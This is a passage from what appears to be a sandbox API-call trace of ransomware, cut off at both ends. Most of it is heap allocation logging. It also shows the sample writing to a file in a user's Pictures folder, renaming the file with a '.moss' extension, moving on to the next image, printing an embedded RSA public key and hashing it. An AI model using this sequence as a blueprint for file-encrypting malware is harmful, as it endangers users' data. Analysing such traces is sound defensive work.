Flags=0x0, Size=0x148) returned 0x35deb08 [0171.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0171.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0171.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0171.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.788] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.788] GetCurrentThreadId () returned 0x324 [0171.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.788] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0171.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.788] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.788] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.788] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0171.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0171.788] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0171.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cad8 [0171.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0171.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0171.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0171.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dd70 [0171.788] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0171.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0171.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0171.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0171.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0171.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0171.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0171.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0171.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dfc8 [0171.788] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0171.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0171.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0171.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0171.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0171.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0171.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0171.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4dfe0 [0171.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0171.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0171.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0171.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dfb0 [0171.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0171.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4ddb8 [0171.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0171.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0171.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0171.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddd0 [0171.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0171.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dde8 [0171.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0171.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4dff8 [0171.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddd0 | out: hHeap=0xcd0000) returned 1 [0171.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4ddd0 [0171.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dde8 | out: hHeap=0xcd0000) returned 1 [0171.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd300 [0171.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0171.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0171.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0171.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0171.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dfc8 | out: hHeap=0xcd0000) returned 1 [0171.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4dfc8 [0171.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0171.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b44ac8 [0171.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0171.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2470 [0171.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddd0 | out: hHeap=0xcd0000) returned 1 [0171.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b48820 [0171.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0171.790] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0x3aa26a0 [0171.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0171.790] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa27b8 [0171.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dfc8 | out: hHeap=0xcd0000) returned 1 [0171.790] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b48a38 [0171.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0171.790] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xdc53e8 [0171.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0171.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0171.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0171.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0171.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa27b8 | out: hHeap=0xcd0000) returned 1 [0171.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48a38 | out: hHeap=0xcd0000) returned 1 [0171.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0171.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0171.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dff8 | out: hHeap=0xcd0000) returned 1 [0171.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0171.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0171.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0171.791] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dfe0 | out: hHeap=0xcd0000) returned 1 [0171.791] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dfb0 | out: hHeap=0xcd0000) returned 1 [0171.791] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0171.791] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0171.791] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0171.791] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4df98 | out: hHeap=0xcd0000) returned 1 [0171.791] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b50db8 | out: hHeap=0xcd0000) returned 1 [0171.791] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44ac8 | out: hHeap=0xcd0000) returned 1 [0171.791] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0171.791] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cad8 | out: hHeap=0xcd0000) returned 1 [0171.791] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0171.791] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0171.791] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0171.791] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0171.791] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0171.791] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0171.791] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0171.791] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.791] WriteFile (in: hFile=0x664, lpBuffer=0x3b62d40*, nNumberOfBytesToWrite=0xfc8d, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b62d40*, lpNumberOfBytesWritten=0x401fb14*=0xfc8d, lpOverlapped=0x0) returned 1 [0171.791] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b62d40 | out: hHeap=0xcd0000) returned 1 [0171.791] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xfc92, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.791] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.792] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.792] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ba0 [0171.792] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b48820 [0171.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b48820, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0171.792] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48c50 [0171.792] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.792] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71ba0 | out: hHeap=0xcd0000) returned 1 [0171.792] WriteFile (in: hFile=0x664, lpBuffer=0x3b48c50*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48c50*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0171.792] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48c50 | out: hHeap=0xcd0000) returned 1 [0171.792] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0171.792] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0171.792] CloseHandle (hObject=0x664) returned 1 [0171.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45fd8 [0171.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8a0) returned 0x3b4b098 [0171.794] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45fd8 | out: hHeap=0xcd0000) returned 1 [0171.794] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\5PrcIytV.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\5prciytv.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\5PrcIytV.png.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\5prciytv.png.moss")) returned 1 [0171.794] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.794] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.795] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0171.796] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cd37460, ftCreationTime.dwHighDateTime=0x1d5e34d, ftLastAccessTime.dwLowDateTime=0xd4a99cc0, ftLastAccessTime.dwHighDateTime=0x1d5e544, ftLastWriteTime.dwLowDateTime=0xd4a99cc0, ftLastWriteTime.dwHighDateTime=0x1d5e544, nFileSizeHigh=0x0, nFileSizeLow=0x114df, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBZsmL.gif", cAlternateFileName="")) returned 1 [0171.796] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.796] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xbe) returned 0x3609e18 [0171.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.796] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\BBZsmL.gif") returned=".gif" [0171.796] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\BBZsmL.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\bbzsml.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.796] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=70879) returned 1 [0171.796] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.799] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x114b9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.799] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.800] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.800] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.800] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.800] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x114df, lpOverlapped=0x0) returned 1 [0171.801] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.801] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0171.801] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.801] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.801] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2dd98) returned 1 [0171.802] CryptCreateHash (in: hProv=0xd2dd98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.802] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.802] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.802] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0171.802] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.802] GetLastError () returned 0x0 [0171.802] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.802] CryptReleaseContext (hProv=0xd2dd98, dwFlags=0x0) returned 1 [0171.802] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.802] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.802] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.802] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.802] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.802] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.802] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.802] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x114e0) returned 0x3b62d40 [0171.803] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0171.803] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0171.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0171.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b44498 [0171.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0171.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b50db8 [0171.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4df98 [0171.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b50e00 [0171.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dfb0 [0171.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dfe0 [0171.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0171.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dff8 [0171.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0171.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0171.803] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0171.803] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dfe0 | out: hHeap=0xcd0000) returned 1 [0171.803] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dff8 | out: hHeap=0xcd0000) returned 1 [0171.803] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0171.803] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0171.803] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0171.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd290 [0171.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4dff8 [0171.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0171.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x3b4dfe0 [0171.804] RtlAllocateHeap (HeapHandle=0xcd0000, 